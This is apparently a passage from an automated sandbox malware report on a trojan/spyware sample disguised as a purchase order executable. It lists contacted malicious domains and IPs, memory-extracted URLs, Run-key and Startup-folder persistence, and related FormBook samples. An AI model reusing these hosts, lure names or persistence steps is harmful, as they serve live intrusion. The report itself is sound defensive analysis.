                                                                    http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://i2.cdn-image.com/__media__/pics/28903/search.png)sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.slwmarketing.online/Small_Business_Financing.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYMsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://purl.oenPO# 81136575.exe, 00000000.00000002.1257906767.0000000005F32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.homebizsuccess.blogsage.exe, 0000000E.00000002.6031342259.000000000FCED000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://js.users.51.la/21851687.jssage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://purl.oen=9sage.exe, 00000011.00000002.6049294447.00000000058A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://homebizsuccess.blog/sn35/?VX=2Ljw85fE62irHv4CO6sOxtyqmKbvzO49yiJy4Znj95Jesage.exe, 0000000E.00000002.6029462311.000000000F382000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000006FF2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              http://www.slwmarketing.online/__media__/design/underconstructionnotice.php?d=slwmarketing.onlinesage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.Slwmarketing.onlinesage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.slwmarketing.online/Marketing_Online_Strategy.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.htmlsage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a9.htmlsage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://delivery.consentmanager.netsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://beta.visualstudio.net/net/sdk/feedback.aspPO# 81136575.exe, 00000000.00000002.1263148906.00000000703F1000.00000020.00000001.01000000.00000009.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.slwmarketing.online/Trade.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6%2FRantCn63Wciee8Esage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoclip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://whois.gandi.net/en/results?search=akravchenko.devsage.exe, 0000000E.00000002.6029462311.000000000DD86000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000059F6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.gandi.net/en/domainsage.exe, 0000000E.00000002.6029462311.000000000DD86000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000059F6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.homebizsuccess.blog/sn35/sage.exe, 0000000E.00000002.6031342259.000000000FCED000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://www.ecosia.org/newtab/clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://ac.ecosia.org/autocomplete?q=clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.slwmarketing.online/Exchange.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6%2FRantCn63Wciesage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://i2.cdn-image.com/__media__/pics/29590/bg1.png)sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.htmlsage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.htmlsage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://go.microsoft.csages.exe, 00000016.00000002.5956179976.00000000008FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://i2.cdn-image.com/__media__/js/min.js?v2.3sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.htmlclip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://gemini.google.com/app?q=clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.slwmarketing.online/__media__/js/trademark.php?d=slwmarketing.online&type=nssage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            217.70.184.50
                                                                                                                            		webredir.vip.gandi.netFrance
                                                                                                                            		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                                                                                            23.225.34.75
                                                                                                                            		www.bashei.topUnited States
                                                                                                                            		40065CNSERVERSUStrue
                                                                                                                            43.153.84.190
                                                                                                                            		www.hubeisuizhou.netJapan4249LILLY-ASUStrue
                                                                                                                            172.67.149.53
                                                                                                                            		www.1win-moldovia.funUnited States
                                                                                                                            		13335CLOUDFLARENETUStrue

                                                                                                                            Private

                                                                                                                            IP
                                                                                                                            127.0.0.1

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1564715
                                                                                                                            Start date and time:2024-11-28 18:47:32 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 22m 25s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                            Run name:Suspected Instruction Hammering
                                                                                                                            Number of analysed new started processes analysed:30
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:1
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Sample name:PO# 81136575.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.adwa.spyw.evad.winEXE@31/9@24/5
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 62.5%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 93%
                                                                                                                            • Number of executed functions: 182
                                                                                                                            • Number of non-executed functions: 4
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                                                                                                            • Execution Graph export aborted for target sages.exe, PID 7024 because it is empty
                                                                                                                            • Execution Graph export aborted for target sages.exe, PID 8000 because it is empty
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                            • VT rate limit hit for: PO# 81136575.exe

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            12:54:39API Interceptor32x Sleep call for process: PING.EXE modified
                                                                                                                            12:56:14API Interceptor16610235x Sleep call for process: sage.exe modified
                                                                                                                            12:57:11API Interceptor1532565x Sleep call for process: clip.exe modified
                                                                                                                            18:53:38AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.lnk
                                                                                                                            18:54:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                            18:59:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sage C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                            18:59:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sage C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            217.70.184.50Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.4nk.education/gnvu/
                                                                                                                            RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.4nk.education/gnvu/
                                                                                                                            statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.4nk.education/gnvu/
                                                                                                                            RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.astorg-group.info/vdvc/
                                                                                                                            RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.astorg-group.info/vdvc/
                                                                                                                            XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.astorg-group.info/vdvc/
                                                                                                                            SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.4nk.education/gnvu/?1Do0qp=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FqHTgxtylpm53oBVxwqxSYDOalMgOBA==&yNNX=snRp
                                                                                                                            #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.4nk.education/gnvu/
                                                                                                                            rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.redlakedispensery.net/6u21/
                                                                                                                            PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.redlakedispensery.net/6u21/
                                                                                                                            23.225.34.75r9856_7.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.bashei.top/u0n6/
                                                                                                                            172.67.149.533Fip115gvy.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.hntv6201.top/4hc5/?1bYL=9VSL3IhCofYw6rlHf1Um7LUlHHZtnqfjmkJX8dllfElXXiDGiageZb50zwldI995GQlRD7XZXw==&5j=tFNxItah5B1Ppp8

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            webredir.vip.gandi.netOrder No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            www.bashei.topr9856_7.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 23.225.34.75
                                                                                                                            www.1win-moldovia.funADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Quotes updates request.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            PO-001.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            LOL and profile.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            Petronas request for-quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            Purchase order.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Remittance advice.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 188.114.96.3

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            LILLY-ASUSsora.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 43.100.95.196
                                                                                                                            loligang.mips-20241128-1536.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 40.237.228.142
                                                                                                                            loligang.mpsl-20241128-1536.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 43.203.62.128
                                                                                                                            spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                            • 43.160.133.103
                                                                                                                            x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                            • 43.29.77.182
                                                                                                                            arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                            • 42.136.202.48
                                                                                                                            mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                            • 43.61.160.83
                                                                                                                            botx.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 43.196.161.67
                                                                                                                            botx.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 43.177.127.170
                                                                                                                            botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 40.35.184.114
                                                                                                                            GANDI-ASDomainnameregistrar-httpwwwgandinetFROrder No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 217.70.184.50
                                                                                                                            CNSERVERSUSSalmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 154.88.22.104
                                                                                                                            nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.209.130.216
                                                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 154.88.22.101
                                                                                                                            pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.43.9.206
                                                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 154.88.22.101
                                                                                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 172.247.21.10
                                                                                                                            piR516SetM.ps1Get hashmaliciousUnknownBrowse
                                                                                                                            • 154.90.62.248
                                                                                                                            XwUh11g4l4.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 154.90.62.248
                                                                                                                            REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 23.225.160.132
                                                                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 154.88.22.105

                                                                                                                            JA3 Fingerprints

                                                                                                                            No context

                                                                                                                            Dropped Files

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            C:\Users\user\AppData\Local\Temp\sages.exeSecuriteInfo.com.Win64.SpywareX-gen.19438.2696.exeGet hashmaliciousDarkTortillaBrowse
